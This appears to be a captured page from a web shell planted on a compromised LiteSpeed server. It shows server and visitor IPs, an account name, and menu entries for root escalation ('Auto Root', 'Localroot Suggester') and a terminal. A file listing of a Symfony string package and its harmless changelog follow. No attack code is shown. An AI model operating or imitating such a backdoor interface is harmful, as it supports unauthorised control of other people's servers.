Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
vendor /
symfony /
string /
Delete
Unzip
Name
Size
Permission
Date
Action
Exception
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Inflector
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Resources
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Slugger
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
AbstractString.php
19.09
KB
-rw-rw-rw-
2024-11-13 02:31
AbstractUnicodeString.php
27.59
KB
-rw-rw-rw-
2024-11-13 02:31
ByteString.php
14.46
KB
-rw-rw-rw-
2024-11-13 02:31
CHANGELOG.md
1.08
KB
-rw-rw-rw-
2024-11-13 02:31
CodePointString.php
7.54
KB
-rw-rw-rw-
2024-11-13 02:31
LICENSE
1.04
KB
-rw-rw-rw-
2024-11-13 02:31
LazyString.php
4.29
KB
-rw-rw-rw-
2024-11-13 02:31
README.md
555
B
-rw-rw-rw-
2024-11-13 02:31
TruncateMode.php
903
B
-rw-rw-rw-
2024-11-13 02:31
UnicodeString.php
12.22
KB
-rw-rw-rw-
2024-11-13 02:31
composer.json
1.37
KB
-rw-rw-rw-
2024-11-13 02:31
Save
Rename
CHANGELOG ========= 7.2 --- * Add `TruncateMode` enum to handle more truncate methods * Add the `AbstractString::kebab()` method 7.1 --- * Add `localeLower()`, `localeUpper()`, `localeTitle()` methods to `AbstractUnicodeString` 6.2 --- * Add support for emoji in `AsciiSlugger` 5.4 --- * Add `trimSuffix()` and `trimPrefix()` methods 5.3 --- * Made `AsciiSlugger` fallback to parent locale's symbolsMap 5.2.0 ----- * added a `FrenchInflector` class 5.1.0 ----- * added the `AbstractString::reverse()` method * made `AbstractString::width()` follow POSIX.1-2001 * added `LazyString` which provides memoizing stringable objects * The component is not marked as `@experimental` anymore * added the `s()` helper method to get either an `UnicodeString` or `ByteString` instance, depending of the input string UTF-8 compliancy * added `$cut` parameter to `Symfony\Component\String\AbstractString::truncate()` * added `AbstractString::containsAny()` * allow passing a string of custom characters to `ByteString::fromRandom()` 5.0.0 ----- * added the component as experimental